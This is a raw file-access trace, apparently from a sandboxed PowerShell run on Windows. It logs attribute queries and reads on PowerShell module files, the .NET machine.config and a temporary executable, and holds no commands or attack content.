Get Info C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache type = file_type True 2
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.psd1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.psm1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.cdxml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.xaml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.ni.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 type = file_attributes True 3
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psd1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psm1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.cdxml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.xaml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.ni.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1 type = file_attributes True 3
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 type = file_attributes True 3
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.psd1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.psm1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.cdxml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.xaml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.ni.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 type = file_attributes True 3
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psd1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psm1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.cdxml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.xaml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.ni.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\PSReadline.psd1 type = file_attributes True 3
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1 type = file_attributes True 3
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.psd1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.psm1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.cdxml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.xaml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.ni.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.dll type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules type = file_attributes True 2
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.psd1 type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.psm1 type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.cdxml type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.xaml type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.ni.dll type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.dll type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AppLocker type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AppvClient type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Appx type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AssignedAccess type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitLocker type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BranchCache type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\CimCmdlets type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\ConfigCI type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Defender type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\DeliveryOptimization type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Dism type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\DnsClient type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\EventTracingManagement type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\International type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\iSCSI type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\ISE type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Kds type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Diagnostics type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Host type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.WSMan.Management type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\MMAgent type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\MsDtc type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\MSMQ type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetAdapter type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetConnection type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetLbfo type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetNat type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetQos type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetSecurity type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetSwitchTeam type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetTCPIP type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetworkConnectivityStatus type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetworkTransition type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PcsvDevice type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PKI type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PnpDevice type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PrintManagement type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Provisioning type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSDiagnostics type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSScheduledJob type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSWorkflow type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\ScheduledTasks type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SecureBoot type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbShare type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbWitness type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\StartLayout type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Storage type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\TLS type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\TroubleshootingPack type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\TrustedPlatformModule type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\UEV type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\VpnClient type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Wdac type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsDeveloperLicense type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsSearch type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsUpdate type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 type = file_attributes True 8
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 type = file_type True 4
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\en-US\Microsoft.PowerShell.Utility.psd1 type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\en\Microsoft.PowerShell.Utility.psd1 type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\PSGetModuleInfo.xml type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll\Microsoft.PowerShell.Commands.Utility.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 type = file_attributes True 6
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 type = file_type True 4
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 type = file_type True 2
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config type = file_attributes True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config type = file_type True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe type = file_type True 2
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\PSWorkflowUtility.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\VpnClient\VpnClient.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\MsDtc\MsDtc.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\TrustedPlatformModule\TrustedPlatformModule.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Provisioning\Provisioning.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BranchCache\BranchCache.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsSearch\WindowsSearch.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Kds\Kds.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\EventTracingManagement\EventTracingManagement.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Diagnostics\Microsoft.PowerShell.Diagnostics.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PcsvDevice\PcsvDevice.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AssignedAccess\AssignedAccess.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\UEV\UEV.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\StartLayout\StartLayout.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1 type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psm1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetAdapter\NetAdapter.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbWitness\SmbWitness.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetNat\NetNat.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Defender\Defender.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Storage\Storage.psd1 type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSWorkflow\PSWorkflow.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SecureBoot\SecureBoot.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\ScheduledTasks\ScheduledTasks.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psm1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetLbfo\NetLbfo.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSDiagnostics\PSDiagnostics.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager\NetworkSwitchManager.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\CimCmdlets\CimCmdlets.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\TLS\TLS.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PnpDevice\PnpDevice.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Host\Microsoft.PowerShell.Host.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.WSMan.Management\Microsoft.WSMan.Management.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetSwitchTeam\NetSwitchTeam.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\WindowsErrorReporting.psm1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\WindowsErrorReporting.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\TroubleshootingPack\TroubleshootingPack.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\DnsClient\DnsClient.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AppvClient\AppvClient.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PrintManagement\PrintManagement.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSScheduledJob\PSScheduledJob.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Appx\Appx.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AppLocker\AppLocker.psd1 type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadLine.psm1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsDeveloperLicense\WindowsDeveloperLicense.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\MMAgent\MMAgent.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetSecurity\NetSecurity.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Wdac\Wdac.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetworkConnectivityStatus\NetworkConnectivityStatus.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetQos\NetQos.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\International\International.psd1 type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetworkTransition\NetworkTransition.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsUpdate\WindowsUpdate.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\DeliveryOptimization\DeliveryOptimization.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\PSDesiredStateConfiguration.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture\NetEventPacketCapture.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\ConfigCI\ConfigCI.psd1 type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\PSReadLine.psm1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetConnection\NetConnection.psd1 type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetTCPIP\NetTCPIP.psd1 type = file_attributes True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 4096, size_out = 4096 True 12
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 3, size_out = 3 True 1
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 9, size_out = 9 True 1
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 44, size_out = 44 True 1
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 12, size_out = 12 True 1
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 4, size_out = 4 True 1
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 7, size_out = 7 True 1
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 22, size_out = 22 True 1
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 19, size_out = 19 True 1
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 2, size_out = 2 True 1
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 24, size_out = 24 True 1
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 11, size_out = 11 True 1
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 4096, size_out = 3715 True 1
Fn
Data
Read C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 size = 4096, size_out = 2435 True 1
Fn
Data
Read C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 size = 637, size_out = 0 True 1
Fn
Read C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 size = 4096, size_out = 0 True 1
Fn
Read C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 size = 4096, size_out = 4096 True 7
Fn
Data
